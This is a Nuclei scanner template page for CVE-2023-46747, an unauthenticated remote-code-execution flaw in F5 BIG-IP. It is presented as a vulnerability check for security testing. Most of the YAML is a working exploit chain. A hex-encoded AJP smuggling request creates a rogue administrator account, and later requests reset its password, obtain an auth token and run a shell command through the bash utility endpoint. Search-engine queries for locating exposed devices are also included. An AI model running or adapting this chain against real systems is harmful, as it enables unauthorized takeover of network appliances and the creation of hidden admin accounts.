Skip to content
Nuclei Templates

F5 BIG-IP - Unauthenticated RCE via AJP Smuggling

ID: CVE-2023-46747

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev

Description

Section titled “Description”

CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.

YAML Source

Section titled “YAML Source”
id: CVE-2023-46747


info:
  name: F5 BIG-IP - Unauthenticated RCE via AJP Smuggling
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.
  reference:
    - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
    - https://my.f5.com/manage/s/article/K000137353
    - http://packetstormsecurity.com/files/175673/F5-BIG-IP-TMUI-AJP-Smuggling-Remote-Command-Execution.html
    - https://www.secpod.com/blog/f5-issues-warning-big-ip-vulnerability-used-in-active-exploit-chain/
    - https://github.com/f1tao/awesome-iot-security-resource
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46747
    cwe-id: CWE-306,CWE-288
    epss-score: 0.97116
    epss-percentile: 0.9979
    cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: f5
    product: big-ip_access_policy_manager
    shodan-query:
      - http.title:"BIG-IP®-+Redirect" +"Server"
      - http.title:"big-ip®-+redirect" +"server"
    fofa-query: title="big-ip®-+redirect" +"server"
    google-query: intitle:"big-ip®-+redirect" +"server"
  tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev
variables:
  username: "{{hex_encode(rand_base(5))}}"
  password: "{{hex_encode(rand_base(12))}}"
  password2: "{{rand_base(14)}}"


http:
  - raw:
      - |+
        POST /tmui/login.jsp HTTP/1.1
        Host: {{Hostname}}
        Transfer-Encoding: chunked, chunked
        Content-Type: application/x-www-form-urlencoded


        204
        {{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}
        0


    unsafe: true


  - raw:
      - |+
        PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
        Content-Type: application/json


        {"password": "{{password2}}"}


      - |+
        POST /mgmt/shared/authn/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"username":"{{hex_decode(username)}}", "password":"{{pass}}"}


      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{token}}
        Content-Type: application/json


        {"command":"run","utilCmdArgs":"-c id"}


    payloads:
      pass:
        - '{{password2}}'
        - '{{hex_decode(password)}}'
    skip-variables-check: true
    stop-at-first-match: true


    extractors:
      - type: regex
        part: body_2
        name: token
        group: 1
        regex:
          - "([A-Z0-9]{26})"
        internal: true


      - type: regex
        part: body_3
        group: 1
        regex:
          - "\"commandResult\":\"(.*)\""


      - type: dsl
        dsl:
          - '"Username:" + hex_decode(username)'
          - '"Password:" + pass'
          - '"Token:" + token'
    matchers:
      - type: word
        words:
          - "commandResult"
          - "uid="
        condition: and
# digest: 4a0a00473045022100d48c8e4433471a582b3ea41361afb218f97efd55dcfdaa7344f66b306801467402201e6d788c83cd8f2ed14f5de39af7c0c56b023dc3d7a7545b08444cd9e402705c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-46747.yaml"

View on Github